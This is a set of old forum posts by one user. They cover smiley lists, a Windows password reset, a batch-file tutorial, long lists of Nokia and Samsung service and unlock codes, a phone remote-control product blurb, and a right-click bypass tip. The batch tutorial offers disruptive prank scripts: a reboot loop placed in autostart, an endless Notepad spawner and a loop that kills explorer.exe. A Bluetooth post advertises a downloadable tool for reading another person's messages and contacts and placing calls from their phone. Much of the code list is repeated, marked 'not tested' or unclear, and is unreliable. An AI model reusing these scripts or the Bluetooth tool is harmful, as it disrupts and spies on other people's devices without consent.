Ali
yahoo smileys comlete list



:)



:(



;)



:D



;;)



>:D<



:-/



:x



:">



:p





:*



=((



:o



x-(



:>



B-)



:-s



#:-S



>:)



:((





:))



:




/:)



=))



O:-)



:-B



=;




-)



8-




L-)





:-&



:-$



[-(



:o)



8-}



<:-P



(:




=P~



:-?



#-o





=D>



:-SS



@-)



:^o



:-w



:-<



>:P



<):)



:@)



3:-o





:(
)



~:>



@};-



%%-



**==



(~~)



~o)



*-:)



8-x



=:)





>-)



:-L



[-o<



$-)



:-"



B-(



:)>-



[-x



\:D/



>:/





;))



o->



o=>



o-+



(%)



:-@



^:)^



:-j



(*)





:o3 puppy dog eyes



I don't know - New! :-??



not listening - New! %-(



pig :@)



cow 3:-O



monkey :(
)



chicken ~:>



rose @};-



good luck %%-



flag **==



pumpkin (~~)



coffee ~O)



idea *-:)



skull 8-X



bug =:)



alien >-)



frustrated :-L



praying [-O<



money eyes $-)



whistling :-"



feeling beat up b-(



peace sign :)>-



shame on you [-X



dancing \:D/



bring it on >:/



hee hee ;))



chatterbox :-@



not worthy ^:)^



oh go on :-j



star (*)



hiro o->



billy o=>



april o-+



yin yang (%)
Ali
1.type compmgmt.msc in RUN field.




2.Go to LOCAL USERS AND GROUPS.



3.In That go to USERS field.



4.Right click on ADMINISTRATOR and SET PASSWORD.



Note: all my documents folders will get deleted so better make a copy of it somewhere else.



ENJOY!!!!!!!!!!!!!
Ali
First of all, I realize there are other articles about this kind of stuff


But I bring up some other stuff that they didn't.



--------------------------------------------------------------------



CMD



CMD is short for commander.

It is great for a lot of things and it's also very clean.







-----------------------------------------------------------------------------------------------

Lets learn how to make the computer shut down everytime it's booted, shall we?

-----------------------------------------------------------------------------------------------







First open CMD,



Next open notepad.



If you write "start shutdown -r" in CMD and press enter, your computer will restart. Also if you write the same in "run".

(Change -r to -s to shutdown computer, or write -l to logg off.)



If you write

---------------------------------------

@echo off



cls

start shutdown -r



cls

goto :a

---------------------------------------

in notepad and save it as something.bat (bat is important) and then open it, your computer will restart in the same way.



So, lets get into autostart. Put that bat file in autostart (autostart can be found in start menu) and each time your

computer is booted it will start that file and your computer will restart.

If you write the next script your computer will try to shutdown several times at once. it will freak for about half a minute

and then turn off.





Lets get a better understanding how scripts works. The above script shuts down your computer, but a bat file normaly opens

CMD and does whatever you told it to do.





@echo off - This is where you put commands that shouldn't be shown as text. For example cls. You don't want that to be text,

it's a command.



cls - This one is pretty good, it clears the text in the CMD screen



CMD - This command gives you a new CMD session.



start - this triggers stuff, in this case it's shutdown.



color - changes the colour in the cmd window, I recommend writing "color 0a", which is a green color thats really cool

on a black window.



title - write "title something" to change title.



goto :a - This one is really, really, really, really cool. It's used for making loops and some more advanced stuff that I

wont go into. Lets say you write

--------------------------------------

@echo off

:a

cls

start shutdown -r



cls

goto :a

--------------------------------------



The goto :a tells you to go to :a higher up in the script. so it starts the script again, then it does the goto :a command

again and the script reloads. Basicaly a loop. You can change the "a" to whatever you want, for example "error". This is

only to make it easier for you to read your script.



The : infront of "a" must stay where it is.

Bad example:

goto: a



Good example:

goto :a



--------------------------------------



dir - This shows you the files in the directory you are in.



dir /s - This shows you all the files on your computer.



echo - write "echo something" and it will be as a text in cmd.



echo. This is a linebrake.



cd - Write cd followed up with a location, to go there in cmd. For example "cd c:\windows".



cd .. - This goes back one step in the directory. For example if your in c:\windows and write "cd .." you go back to c:\.



So now you know the basics, which we'll use to make you computer do stuff. In cmd you can write "help" to get a list of most

commands.



Moving away from learning commands now.







-----------------------------------------------------------------------------------------------

Lets make a spamm script.

-----------------------------------------------------------------------------------------------







-----------------------------------------------

@echo off

cls

:a

start notepad.exe

goto :a



-----------------------------------------------

this script will continue to open notepad until you close cmd. Not recommended to run this on a slow computer.

As we said before, "start" triggers things, this script triggers notepad and then the loop (goto :a) is triggered.







-----------------------------------------------------------------------------------------------

Lets just mess around.

-----------------------------------------------------------------------------------------------







-----------------------------------------------

@echo off

cls

:a

taskkill /im explorer.exe /f

goto :a

-----------------------------------------------



This will close the bar where start menu and tasks are shown, for example if you open internet you will see it at the bottom

of the screen on the explorer bar.

Closing this will leave people with little things to do.



Hope you liked the article. If you think I missed something please contact me.
Ali
1 Imagine ur cell battery is very low, u r expecting an important call and u don't have a charger.




Nokia instrument comes with a reserve battery. To activate, key is "*3370#"



Ur cell will restart with this reserve and ur instrument will show a 50% incerase in battery.



This reserve will get charged when u charge ur cell next time.



*3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx. 5%

#3370# Deactivate Enhanced Full Rate Codec( EFR)





*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound

but you should gain approx 30% more Talk Time

*#4720# Deactivate Half Rate Codec



2 *#0000# Displays your phones software version,



1st Line :S oftware Version,

2nd Line : Software Release Date,

3rd Line : Compression Type

3 *#9999# Phones software v ersion if *#0000# does not work



4 *#06# For checking the International Mobile Equipment Identity (IMEI Number)



5 #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)



6 #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)



7 #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)



8 #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)



9 *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone)



10 *#21# Allows you to check the number that "All Calls" are diverted To



11 *#2640# Displays security code in use





12 *#30# Lets you see the private number



13 *#43# Allows you to check the "Call Waiting" status of your phone.



14 *#61# Allows you to check the number that "On No Reply" calls are diverted to



15 *#62# Allows you to check the number that "Divert If Unrea chable(no service)" calls are diverted to



16 *#67# Allows you to check the number that "On Busy Calls" are diverted to



17 *#67705646#R emoves operator logo on 3310 & 3330



18 *#73# Reset phone timers and game scores



19 *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it

means you will get the best standby time possible



20 *#7760# Manufactures code



21 *#7780# Restore factory settings



22 *#8110# Software version for the nokia 8110



23 *#92702689# (to rember *#WAR0ANTY#)



Displays -

1.Serial Number,

2.Date Made

3.Purchase Date,

4.Date of last repair (0000 for no repairs),

5.Transfer User Data.

To exit this mode -you need to switch your phone off then on again



24 *#94870345123456789# Deactivate the PWM-Mem



25 **21*number# Turn on "All Calls" diverting to the phone number entered



26 **61*number# Turn on "No Reply" diverting to the phone number entered



27 **67*number# Turn on "On Busy" diverting to the phone number entered



Each command is prefixed with either one or two * or # characters as follows:

** Register and Activate

* Activate

## De-Register (and Deactivate)

# Deactivate

*# Check Status

© Call button







Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key - this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).



Command Description Command String

Security

Change call barring code **03*OldCode*NewCode*NewCode#©

Change call barring code **03*330*OldCode*NewCode*NewCode#©

Change PIN code **04*OldPIN*NewPIN*NewPIN#©

Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©

Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©

Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©

Display IMEI *#06#

Call Forwarding (Diversions)

De-register all call diversions ##002#©

Set all configured call diversions to number and activate **004*number#©

De-register all configured call diversions (no answer, not reachable, busy) ##004#©

Unconditionally divert all calls to number and activate **21*number#©

Activate unconditionally divert all calls *21#©

De-register unconditionally divert all calls ##21#©

Deactivate unconditionally divert all calls #21#©

Check status of unconditionally divert all calls *#21#©

Divert on no answer to number and activate **61*number#©

Activate divert on no answer *61#©

De-register divert on no answer ##61#©

Deactivate divert on no answer #61#©

Check status of divert on no answer *#61#©

Divert on not reachable to number and activate **62*number#©

Activate divert on not reachable *62#©

De-register divert on not reachable ##62#©

Deactivate divert on not reachable #62#©

Check status of divert on not reachable *#62#©

Divert on busy to number and activate /td> **67*number#©<

Activate divert on busy *67#©

De-register divert on busy ##67#©

Deactivate divert on busy #67#©

Check status of divert on busy *#67#©

Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)

Call barring

Activate barr all outgoing calls (see Security to set code) **33*code#©

Deactivate barr all outgoing calls #33*code#©

Check status of barr all outgoing calls *#33#©

Activate barr all calls **330*code#©

Deactivate barr all calls #330*code#©

Check status of barr all calls /td> *#330*code#©<

Activate barr all outgoing international calls **331*code#©

Deactivate barr all outgoing international calls #331*code#©

Check status of barr all outgoing international calls *#331#©

Activate barr all outgoing international calls except to home country **332*code#©

Deactivate barr all outgoing international calls except to home country #332*code#©

Check status of barr all outgoing international calls except to home country *#332#©

Activate barr all outgoing calls **333*code#©

Deactivate barr all outgoing calls #333*code#©

Check status of barr all outgoing calls *#333#©

Activate barr all incoming calls **35*code#©

Deactivate barr all incoming calls #35*code#©

Check status of barr all incoming calls *#35#©

Activate barr all incoming calls when roaming **351*code#©

Deactivate barr all incoming calls when roaming #351*code#©

Check status of barr all incoming calls when roaming *#351#©

Activate barr all incoming calls **353*code#©

Deactivate barr all incoming calls #353*code#©

Check status of barr all incoming calls *#353#©

Call waiting

Activate call waiting *43*#©

Deactivate call waiting #43##©

Check status of call waiting *#43#©

Calling Line Identification

The following only works if CLIP and CLIR are enabled (ask your service provider)

CLIP: Presentation of the number of the incoming call

Activate CLIP **30#©

Deactivate CLIP ##30#©

Check status of CLIP *#30#©

CLIR: Presentation of one's own number to the to the called party

Activate CLIR **31#©

Activate CLIR for the actual call *31#number©

Deactivate CLIR ##31#©

Deactivate CLIR for the actual call #31#number©

Check status of CLIR *#31#©

COLP: Presentation of the actual number reached (if number called was diverted to another number

Activate COLP *76#©

Deactivate COLP #76#©

Check status of COLP *#76#©

COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)

Activate COLR *77#©

Deactivate COLR #77#©

Check status of COLR *#77#©
Ali
LAtest






*#1111# S/W Version

*#1234# Firmware Version

*#2222# H/W Version

*#8999*8376263# All Versions Together



*#8999*8378# Test Menu

*#4777*8665# GPSR Tool

*#8999*523# LCD Brightness

*#8999*377# Error Menu

*#8999*327# EEP Menu

*#8999*3825523# Don't Know.

*#8999*667# Debug Mode

*#92782# PhoneModel (Wap)

#*5737425# JAVA Mode

*#2255# Call List

*#232337# Bluetooth MAC Adress

*#5282837# Java Version



#*4773# Incremental Redundancy

#*7752# 8 PSK uplink capability bit

#*7785# Reset wakeup & RTK timer cariables/variables

#*1200# ????

#*7200# Tone Generator Mute

#*3888# BLUETOOTH Test mode

#*#8999*324# ??

#*7828# Task screen

#*5111# ??

#*#8377466# S/W Version & H/W Version

#*2562# Restarts Phone

#*2565# No Blocking? General Defense.

#*3353# General Defense, Code Erased.

#*3837# Phone Hangs on White screen

#*3849# Restarts Phone

#*3851# Restarts Phone

#*3876# Restarts Phone

#*7222# Operation Typ: (Class C GSM)

#*7224# !!! ERROR !!!

#*7252# Operation Typ: (Class B GPRS)

#*7271# CMD: (Not Available)

#*7274# CMD: (Not Available)

#*7337# Restarts Phone (Resets Wap Settings)

#*2787# CRTP ON/OFF

#*2886# AutoAnswer ON/OFF

#*3737# L1 AFC

#*5133# L1 HO Data

#*7288# GPRS Detached/Attached

#*7287# GPRS Attached

#*7666# White Screen

#*7693# Sleep Deactivate/Activate

#*7284# L1 HO Data

#*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)

#*2286# Databattery

#*2527# GPRS switching set to (Class 4, 8, 9, 10)

#*2679# Copycat feature Activa/Deactivate

#*3940# External looptest 9600 bps

#*4263# Handsfree mode Activate/Deactivate

#*4700# Please use function 2637

#*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)

#*2558# Time ON

#*3370# Same as 4700

#*3941# External looptest 115200 bps

#*5176# L1 Sleep

#*7462# SIM Phase

#*7983# Voltage/Freq

#*7986# Voltage

#*8466# Old Time

#*2255# Call Failed

#*5187# L1C2G trace Activate/Deactivate

#*5376# DELETE ALL SMS!!!!

#*6837# Official Software Version: (0003000016000702)

#*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)

#*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)

#*2337# Permanent Registration Beep

#*2474# Charging Duration

#*2834# Audio Path (Handsfree)

#*3270# DCS Support Activate/Deactivate

#*3282# Data Activate/Deactivate

#*3476# EGSM Activate/Deactivate

#*3676# FORMAT FLASH VOLUME!!!

#*4760# GSM Activate/Deactivate

#*4864# White Screen

#*5171# L1P1

#*5172# L1P2

#*5173# L1P3

#*7326# Accessory

#*7683# Sleep variable

#*8465# Time in L1

#*2252# Current CAL

#*2836# AVDDSS Management Activate/Deactivate

#*3877# Dump of SPY trace

#*7728# RSAV

#*2677# Same as 4700

#*3797# Blinks 3D030300 in RED

#*3728# Time 2 Decod

#*3725# B4 last off

#*7372# Resetting the time to DPB variables

#*7732# Packet flow context bit Activate/Deactivate

#*6833# New uplink establishment Activate/Deactivate

#*3273# EGPRS multislot (Class 4, 8, 9, 10)

#*7722# RLC bitmap compression Activate/Deactivate

#*2351# Blinks 1347E201 in RED

#*4472# Hysteresis of serving cell: 3 dB

#*2775# Switch to 2 inner speaker

#*9270# Force WBS

#*7878# FirstStartup (0=NO, 1=YES)

#*3757# DSL UART speed set to (LOW, HIGH)

#*8726# Switches USBACM to Normal

#*8724# Switches USBACM to Generator mode

#*8727# Switches USBACM to Slink mode

#*8725# Switches USBACM to Loop-back mode

#*3838# Blinks 3D030300 in RED

#*2077# GPRS Switch

#*2027# GPRS Switch

#*0227# GPRS Switch

#*0277# GPRS Switch

#*22671# AMR REC START

#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)

#*22673# Pause REC

#*22674# Resume REC

#*22675# AMR Playback

#*22676# AMR Stop Play

#*22677# Pause Play

#*22678# Resume Play

#*77261# PCM Rec Req

#*77262# Stop PCM Rec

#*77263# PCM Playback

#*77264# PCM Stop Play

#*2872# CNT

*#8999*283# ???

#*22679# AMR Get Time

*288666# ???

*2886633# ???

*#8999*364# Watchdog ON/OFF

#*8370# Tfs4.0 Test 0

#*8371# Tfs4.0 Test 1

#*8372# Tfs4.0 Test 2

#*8373# Tfs4.0 Test 3

#*8374# Tfs4.0 Test 4

#*8375# Tfs4.0 Test 5

#*8376# Tfs4.0 Test 6

#*8377# Tfs4.0 Test 7

#*8378# Tfs4.0 Test 8

#*8379# Tfs4.0 Test 9

#837837# error=...



#*36245# Turns Email TestMenu on.



*2767*22236245# Email EPP set (....)!

*2767*837836245# Email Test Account!

*2767*29536245# Email Test2 Account!

*2767*036245# Email EPP reset!

*2767*136245# Email EPP set (1)!

*2767*736245# Email EPP set (7)!

*2767*3036245# Email...

*2767*3136245# Email...

*2767*3336245# Email...

*2767*3436245# Email...

*2767*3936245# Email...

*2767*4136245# Email...

*2767*4336245# Email...

*2767*4436245# Email...

*2767*4536245# Email...

*2767*4636245# Email...

*2767*4936245# Email...

*2767*6036245# Email...

*2767*6136245# Email...

*2767*6236245# Email...

*2767*6336245# Email...

*2767*6536245# Email...

*2767*6636245# Email...

*2767*8636245# Email...

*2767*85236245# Email...



*2767*3855# = E2P Full Reset

*2767*2878# = E2P Custom Reset

*2767*927# = E2P Wap Reset

*2767*226372# = E2P Camera Reset

*2767*688# Reset Mobile TV

#7263867# = RAM Dump (On or Off)

*2767*49927# = Germany WAP Settings

*2767*44927# = UK WAP Settings

*2767*31927# = Netherlands WAP Settings

*2767*420927# = Czech WAP Settings

*2767*43927# = Austria WAP Settings

*2767*39927# = Italy WAP Settings

*2767*33927# = France WAP Settings

*2767*351927# = Portugal WAP Settings

*2767*34927# = Spain WAP Settings

*2767*46927# = Sweden WAP Settings

*2767*380927# = Ukraine WAP Settings

*2767*7927# = Russia WAP Settings

*2767*30927# = GREECE WAP Settings

*2767*73738927# = WAP Settings Reset

*2767*49667# = Germany MMS Settings

*2767*44667# = UK MMS Settings

*2767*31667# = Netherlands MMS Settings

*2767*420667# = Czech MMS Settings

*2767*43667# = Austria MMS Settings

*2767*39667# = Italy MMS Settings

*2767*33667# = France MMS Settings

*2767*351667# = Portugal MMS Settings

*2767*34667# = Spain MMS Settings

*2767*46667# = Sweden MMS Settings

*2767*380667# = Ukraine MMS Settings

*2767*7667#. = Russia MMS Settings

*2767*30667# = GREECE MMS Settings



*#7465625# = Check the locks

*7465625*638*Code# = Enables Network lock

#7465625*638*Code# = Disables Network lock

*7465625*782*Code# = Enables Subset lock

#7465625*782*Code# = Disables Subset lock

*7465625*77*Code# = Enables SP lock

#7465625*77*Code# = Disables SP lock

*7465625*27*Code# = Enables CP lock

#7465625*27*Code# = Disables CP lock

*7465625*746*Code# = Enables SIM lock

#7465625*746*Code# = Disables SIM lock

*7465625*228# = Activa lock ON

#7465625*228# = Activa lock OFF

*7465625*28638# = Auto Network lock ON

#7465625*28638# = Auto Network lock OFF

*7465625*28782# = Auto subset lock ON

#7465625*28782# = Auto subset lock OFF

*7465625*2877# = Auto SP lock ON

#7465625*2877# = Auto SP lock OFF

*7465625*2827# = Auto CP lock ON

#7465625*2827# = Auto CP lock OFF

*7465625*28746# = Auto SIM lock ON

#7465625*28746# = Auto SIM lock OFF





**********************



#*7878# FirstStartup (0=NO, 1=YES)

#*3838# Blinks 3D030300 in RED

#*2077# GPRS Switch

#*2027# GPRS Switch

#*0227# GPRS Switch

#*0277# GPRS Switch

#*22671# AMR REC START

#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)

#*22673# Pause REC

#*22674# Resume REC

#*22675# AMR Playback

#*22676# AMR Stop Play

#*22677# Pause Play

#*22678# Resume Play

#*77261# PCM Rec Req

#*77262# Stop PCM Rec

#*77263# PCM Playback

#*77264# PCM Stop Play

#*22679# AMR Get Time

*#8999*364# Watchdog ON/OFF

*#8999*427# WATCHDOG signal route setup

*2767*3855# = Full Reset (Caution every stored data will be deleted.)

*2767*2878# = Custom Reset

*2767*927# = Wap Reset

*2767*226372# = Camera Reset (deletes photos)

*2767*688# Reset Mobile TV

#7263867# = RAM Dump (On or Off)

Samsung Secret Codes Part 3

*2767*49927# = Germany WAP Settings

*2767*44927# = UK WAP Settings

*2767*31927# = Netherlands WAP Settings

*2767*420927# = Czech WAP Settings

*2767*43927# = Austria WAP Settings

*2767*39927# = Italy WAP Settings

*2767*33927# = France WAP Settings

*2767*351927# = Portugal WAP Settings

*2767*34927# = Spain WAP Settings

*2767*46927# = Sweden WAP Settings

*2767*380927# = Ukraine WAP Settings

*2767*7927# = Russia WAP Settings

*2767*30927# = GREECE WAP Settings

*2767*73738927# = WAP Settings Reset

*2767*49667# = Germany MMS Settings

*2767*44667# = UK MMS Settings

*2767*31667# = Netherlands MMS Settings

*2767*420667# = Czech MMS Settings

*2767*43667# = Austria MMS Settings

*2767*39667# = Italy MMS Settings

*2767*33667# = France MMS Settings

*2767*351667# = Portugal MMS Settings

*2767*34667# = Spain MMS Settings

*2767*46667# = Sweden MMS Settings

*2767*380667# = Ukraine MMS Settings

*2767*7667#. = Russia MMS Settings

*2767*30667# = GREECE MMS Settings

*#7465625# = Check the phone lock status

*7465625*638*Code# = Enables Network lock

#7465625*638*Code# = Disables Network lock

*7465625*782*Code# = Enables Subset lock

#7465625*782*Code# = Disables Subset lock

*7465625*77*Code# = Enables SP lock

#7465625*77*Code# = Disables SP lock

*7465625*27*Code# = Enables CP lock

#7465625*27*Code# = Disables CP lock

*7465625*746*Code# = Enables SIM lock

#7465625*746*Code# = Disables SIM lock

*7465625*228# = Activa lock ON

#7465625*228# = Activa lock OFF

*7465625*28638# = Auto Network lock ON

#7465625*28638# = Auto Network lock OFF

*7465625*28782# = Auto subset lock ON

#7465625*28782# = Auto subset lock OFF

*7465625*2877# = Auto SP lock ON

#7465625*2877# = Auto SP lock OFF

*7465625*2827# = Auto CP lock ON

#7465625*2827# = Auto CP lock OFF

*7465625*28746# = Auto SIM lock ON

#7465625*28746# = Auto SIM lock OFF



Type *#9998*627837793# Go to the 'my parameters' and there you will find new menu where you can unlock phone.(not tested-for samsung C100)

To unlock a Samsung turn the phone off take the sim card and type the following code *#pw+15853649247w# .



Java status code: #*53696# (Samsung X600)



If you want to unlock your phone put a sim from another company then type *#9998*3323# it will reset your phone. Push exit and then push 7, it will reset again. Put your other sim in and it will say sim lock, type in 00000000 then it should be unlocked. Type in *0141# then the green call batton and it's unlocked to all networks. This code may not work on the older phones and some of the newer phones. If it doesn't work you will have to reset your phone without a sim in it by typing *#2767*2878# or *#9998*3855# (not tested)







*2767*688# = Unlocking Code

*#8999*8378# = All in one Code

*#4777*8665# = GPSR Tool

*#8999*523# = LCD Brightness

*#8999*3825523# = External Display

*#8999*377# = Errors

#*5737425# = JAVA Something{I choose 2 and it chrashed}][/b]

*#2255# = Call List



#*536961# = Java Status Code

#*536962# = Java Status Code

#*536963# = Java Status Code

#*53696# = Java Status Code



#*1200# = AFC DAC Val

#*1300# = IMEI

#*1400# = IMSI



#*2562# = ??? White for 15 secs than restarts.

#*2565# = Check Blocking

#*3353# = Check Code

#*3837# = ??? White for 15 secs than restarts.

#*3849# = ??? White for 15 secs than restarts.

#*3851# = ??? White for 15 secs than restarts.

#*3876# = ??? White for 15 secs than restarts.



#*7222# = Operation Typ (Class C GSM)

#*7224# = I Got !! ERROR !!

#*7252# = Oparation Typ (Class B GPRS)

#*7271# = Multi Slot (Class 1 GPRS)

#*7274# = Multi Slot (Class 4 GPRS)

#*7276# = Dunno

#*7337# = EEPROM Reset (Unlock and Resets WAP Settings)

#*2787# = CRTP ON/OFF

#*3737# = L1 Dbg data

#*5133# = L1 Dbg data

#*7288# = GPRS Attached

#*7287# = GPRS Detached

#*7666# = SrCell Data

#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)

#*7284# = Class : B,C or GPRS

#*2256# = Calibration Info

#*2286# = Battery Data

#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)

#*2679# = Copycat feature (Activate or Deactivate)

#*3940# = External loop test 9600 bps

#*4263# = Handsfree mode (Activate or Deactivate)

#*4700# = Half Rate (Activate or Deactivate)

#*7352# = BVMC Reg value

#*8462# = Sleeptime

#*2558# = Time ON

#*3370# = EFR (Activate or Deactivate)

#*3941# = External looptest 115200 bps

#*5176# = L1 Sleep

#*7462# = SIM phase

#*7983# = Voltage/Frequenci (Activate or Deactivate)

#*7986# = Voltage (Activate or Deactivate)

#*8466# = Old time

#*2255# = Call ???

#*5187# = L1C2G trace (Activate or Deactivate)

#*5376# = ??? White for 15 secs than restarts.

#*6837# = Official Software Version

#*7524# = KCGPRS

#*7562# = LOCI GPRS

#*7638# = RLC allways open ended TBF (Activate or Deactivate)

#*7632# = Sleep mode Debug

#*7673# = Sleep mode RESET

#*2337# = Permanent Registration Beep

#*2474# = ???

#*2834# = Audio Path

#*3270# = DCS support (Activate or Deactivate)

#*3282# = Data (Activate or Deactivate)

#*3476# = EGSM (Activate or Deactivate)

#*3676# = Flash volume formated

#*4760# = GSM (Activate or Deactivate)

#*4864# = Dunno doesn't work on newer versions

#*5171# = L1P1

#*5172# = L1P2

#*5173# = L1P3

#*7326# = Accessory (I got Vibrator)

#*7683# = Sleep variable (

#*7762# = SMS Brearer CS (Activate or Deactivate)

#*8465# = Time in L1

#*9795# = wtls key

#*2252# = Current CAL

#*2836# = AVDDSS Management (Activate or Deactivate)

#*3877# = Dump of SPY trace

#*7728# = RSAV done# (Everything went to standart but nothing was deleted)

#*2677# = ARM State (None or Full Rate)

*#8999*636# = Have no clue what it is, i see 20 lines

*#9999# = Software version

*#8999*8376263# = HW ver, SW ver and Build Date

*#8888# = HW version

*#8377466# = Same HW/SW version thing



*#7465625# = Check the locks

*7465625*638*Code# = Enables Network lock

#7465625*638*Code# = Disables Network lock

*7465625*782*Code# = Enables Subset lock

#7465625*782*Code# = Disables Subset lock

*7465625*77*Code# = Enables SP lock

#7465625*77*Code# = Disables SP lock

*7465625*27*Code# = Enables CP lock





#7465625*638*Code# = Disables Network lock

*7465625*782*Code# = Enables Subset lock

#7465625*782*Code# = Disables Subset lock

*7465625*77*Code# = Enables SP lock

#7465625*77*Code# = Disables SP lock

*7465625*27*Code# = Enables CP lock

#7465625*27*Code# = Disables CP lock

*7465625*746*Code# = Enables SIM lock

#7465625*746*Code# = Disables SIM lock

*7465625*228# = Activa lock ON

#7465625*228# = Activa lock OFF

*7465625*28638# = Auto Network lock ON

#7465625*28638# = Auto Network lock OFF

*7465625*28782# = Auto subset lock ON

#7465625*28782# = Auto subset lock OFF

*7465625*2877# = Auto SP lock ON

#7465625*2877# = Auto SP lock OFF

*7465625*2827# = Auto CP lock ON

#7465625*2827# = Auto CP lock OFF

*7465625*28746# = Auto SIM lock ON

#7465625*28746# = Auto SIM lock OFF



*2767*3855# = E2P Full Reset

*2767*2878# = E2P Custom Reset

*2767*927# = E2P WAP Reset

*2767*226372# = E2P Camera Reset

#*6420# = MIC Off

#*6421# = MIC On

#*6422# = MIC Data

#*6428# = MIC Measurement

#*3230# = Trace enable and DCD disable

#*3231# = Trace disable and DCD enable

#*3232# = Current Mode

#7263867# = RAM Dump (On or Off)

*2767*49927# = Germany WAP Settings

*2767*44927# = UK WAP Settings

*2767*31927# = Netherlands WAP Settings

*2767*420927# = Czech WAP Settings

*2767*43927# = Austria WAP Settings

*2767*39927# = Italy WAP Settings

*2767*33927# = France WAP Settings

*2767*351927# = Portugal WAP Settings

*2767*34927# = Spain WAP Settings

*2767*46927# = Sweden WAP Settings

*2767*380927# = Ukraine WAP Settings

*2767*7927# = Russia WAP Settings

*2767*30927# = GREECE WAP Settings

*2767*73738927# = WAP Settings Reset

*2767*49667# = Germany MMS Settings

*2767*44667# = UK MMS Settings

*2767*31667# = Netherlands MMS Settings

*2767*420667# = Czech MMS Settings

*2767*43667# = Austria MMS Settings

*2767*39667# = Italy MMS Settings

*2767*33667# = France MMS Settings

*2767*351667# = Portugal MMS Settings

*2767*34667# = Spain MMS Settings

*2767*46667# = Sweden MMS Settings

*2767*380667# = Ukraine MMS Settings

*2767*7667#. = Russia MMS Settings

*2767*30667# = GREECE MMS Settings

*335# = Delete all MMS Messages

*663867# = Dump Mm file

#*536961# = WAPSAR enable / HTTP disable

#*536962# = WAPSAR disable / HTTP enable

#*536963# = Serial eable / Others disable

#*53696# = Java Download Mode

#*5663351# = WAP Model ID [Your Model]

#*5663352# = WAP Model ID [SEC-SGHXXXX/1.0]

#*566335# = WAP Model ID [SEC-SGHXXXX/1.0]

*2767*66335# = Check on which model it is

*2767*7100# = SEC-SGHS100/1.0

*2767*8200# = SEC-SGHV200/1.0

*2767*7300# = SEC-SGHS300/1.0

*2767*7650# = Nokia7650/1.0

*2767*2877368# = Reset WAP Model ID to standart
Ali
Once connected to a another phone via bluetooth you can:


- read his messages

- read his contacts

- change profile

- play his ringtone even if phone is on silent

- play his songs(in his phone)

- restart the phone

- switch off the phone

- restore factory settings

- change ringing volume

- And here comes the best

Call from his phone" it includes all call functions like hold etc.

Notes:

1.) When connecting devices use a code 0000


2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application


RS.COM mirror

http://rapidshare.com/files/35224316/Bluetooth.rar


Password:

gOzz
Ali
NEW: Now also running on Nokia N70, 668x, 6630, 6670, 3230, 6260 and 7610


NEW: Connect via USB with the DKU-2 cable (compatible phones only)

NEW: High performance screen algorithm using pure ARM/Thumb assembler and new compression scheme

Remote S60 Professional - Operate your phone from your desktop PC







Remote S60 Professional by mobileways.de lets you operate your Series 60 phone from your Windows computer. You can access and control all applications on your phone by using your PC's keyboard while watching the screen of your phone in a virtual window in real time.



The Perfect Tool for Presentations, Tutorials or Device and Application Testing



With Remote S60 Professional, you can conveniently demo any applications or services on your phone in realtime. Remote S60 Professional displays your phone's screen in a virtual window on your PC. You can either use a wireless bluetooth connection for best mobility during your presentation or a USB cable (DKU-2) for best realtime performance.

Remote S60 Professional supports skins for different mobile phone models, offers a customizable (HTML) fullscreen mode and allows you to record AVI movies.



For device and service testing, just let your automated testing tool control the Remote S60 Professional Windows application. You can connect multiple devices to one PC by using multiple instances of Remote S60 Professional.



Manage your Everyday Tasks



Remote S60 Professional helps you compose SMS, enter contacts, add WAP/WEB URLs, create and change calender entries or manage your phone's settings with ease.



Features of Remote S60 Professional:



* Connect your phone with the USB cable DKU-2 (compatible Series 60 v2 phones only!) or by Bluetooth Serial Port

* For (old) Series 60 v1 phones: conveniently connect via the PC Suite / mRouter (Nokia 6600, 3650, N-Gage, Siemens SX1, Sendo X, Panasonic X700/X800)

* Support for multiple skins (showing different mobile phone models)

* Customizable (HTML) fullscreen mode (with zoom feature)

* 3 different zoom levels (2x, 3x and 4x)

* Use your keyboard to control your phone in realtime

* Make screenshots, copy them to the clipboard or save them to your PC

* Create AVI movies while navigating on your phone

* Profiles for quickly switching between different performance settings

* Advanced options for balancing performance vs. power consumption:

Reduced color modes, different compression levels, application priority, sampling frequency

* Multiple devices connected to the same PC by using multiple instances of Remote S60 Professional



You need to install two softwares for that..



Download:

1st Software(Remote S60 Professional)

2nd Software(Softcam)
Ali
Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.




It's easy to change, assuming your using IE 6:

Click "Tools"->"Internet Options"

Click the "Security" tab

Click "Custom Level"

Scroll down to the "Scripting" section

Set "Active Scripting" to "disable"

Click "Ok" a couple of times.



You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.
